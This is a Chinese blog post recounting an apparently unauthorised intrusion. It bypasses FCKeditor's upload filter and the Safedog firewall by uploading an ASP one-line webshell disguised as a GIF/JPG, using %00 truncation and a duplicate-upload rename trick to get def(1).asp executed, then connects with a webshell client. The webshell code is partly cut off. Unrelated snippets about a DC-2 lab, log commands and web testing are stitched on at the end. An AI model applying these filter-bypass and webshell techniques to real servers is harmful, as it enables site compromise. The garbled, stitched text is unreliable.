實戰入侵 突破FCK 安全狗上傳

2021-09-07 08:19:49 字數 1934 閱讀 3892

ps:有點尷尬,二次上傳突破fck,免殺馬兒過狗。

剛開始和超霸一起弄,***gb.弄到四點多,早上尼瑪七點多的又去考試,雖然考試還是睡著了,但是***gb感覺日子好充實啊!

先準備好乙個過狗一句話:

1")<>""then session("

1")=request("

1"):end if:if session("

1")<>"" then execute session("

1")%>gif89a

#密碼1

將馬兒儲存為jpg格式,上傳後抓包。

選擇%00右鍵

然後傳送。然後就會變成這個樣子

這裡涉及到兩個知識,

1.%00的意思是將「;jpg」進行截斷,也就是捨去,不要它。

2.為啥是def.asp;jpg呢?這裡其實就是突破fck的重點了。為啥呢?因為fck會逮住小數點後面的名稱。如果是asp肯定能是不行的,所以要承接乙個的,因為這個是要給fck看的。如果後面的不是他執行的格式,也肯定不讓你上傳。

過狗上傳

那麼過狗的姿勢呢?其實很簡單。如下所示

然後傳送go。

注意!上傳成功後返回的路徑是:/upfile/\/def.asp_;jpg

這個顯然不能被解析!而且會被安全狗攔截!

很簡單因為def.asp_;jpg。在安全狗裡面iis6.0的解析漏洞是沒辦法利用的。就算是也是不可以連線的!

那我們再go一次!

然後你會驚奇的發現。

檔案被改名成了:/upfile/\/def(1).asp

這裡又涉及到乙個重新命名的知識點,當你本地建立乙個已有的檔案windows就會給你重新命名。(ps:其實之前那個沒有被刪,只是不讓你訪問罷了.)

由upfile/\/def.asp_;jpg

重新命名成了

/upfile/\/def(1).asp

為啥_;jpg沒有了呢。很簡單被我們的%00給截斷了的。所以也就是upfile/def.asp被重新命名為upfile/def(1).asp的過程。

那麼我們現在訪問一下。

如圖所示。成功了的!直接拿菜刀連線。

拿下!通過兩天才拿下,這裡還有幾個小的知識點要總結的。

滲透實戰 滲透測試實戰 DC 2 靶機入侵

dc 2 靶機實戰 啟動dc 2 配置其網路為nat,檢視其mac 位址,重啟dc 2 使其網路配置生效 使用nmap 掃瞄內網網段 得到dc 2 的ip位址192.168.1.162 對其進行資訊收集 訪問其ip 連線失敗 新增本地dns解析 再訪問該 解析成功 cewl 工具 cewl dc 2...

運維安全之入侵檢測

檢視系統日誌 檢視安全相關日誌 ssh遠端登入失敗日誌 grep i failed var log securessh遠端登入成功日誌 grep i accepted var log secure統計登入成功或登入失敗的ip,並進行去重降序排列 grep i accepted var log sec...

WEB安全測試實戰

一 常見web安全漏洞 1 黑客技術分析 2 常用黑客工具介紹 3 web常見攻擊方式 二 web安全漏洞檢測 1 http安全測試 2 url查詢字串篡改 post資料篡改 cookie篡改 http頭篡改 3 http安全漏洞檢查 常用工具 案例分析 4 跨站指令碼攻擊 xss 方法 xss原理...